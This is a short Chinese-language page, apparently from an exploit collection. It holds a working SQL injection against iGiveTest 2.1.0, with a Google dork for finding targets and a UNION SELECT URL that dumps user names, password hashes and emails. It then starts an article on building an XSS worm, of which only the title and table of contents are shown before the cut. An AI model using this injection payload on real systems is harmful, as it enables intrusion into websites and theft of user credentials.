iGiveTest 2.1.0 注入漏洞

# Version: <= 2.1.0 # Homepage: http://iGiveTest.com/ Google Dork: "Powered by iGiveTest" 随便注册个号 http://localhost/[PATH]/users.php?action=groups&order=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1 第一个账号 冒号后面的就是密码了

一只XSS蠕虫的实现

一只XSS蠕虫的实现 Author: kunting520        EMail: kunting520@gmail.com Date: 2011-06-20 [ 目录 ] 0×-1 声明 0×00 前言 0×01 关于XSS 0×02 发现XSS 0×03 蠕虫实现 0×04 总结 0×-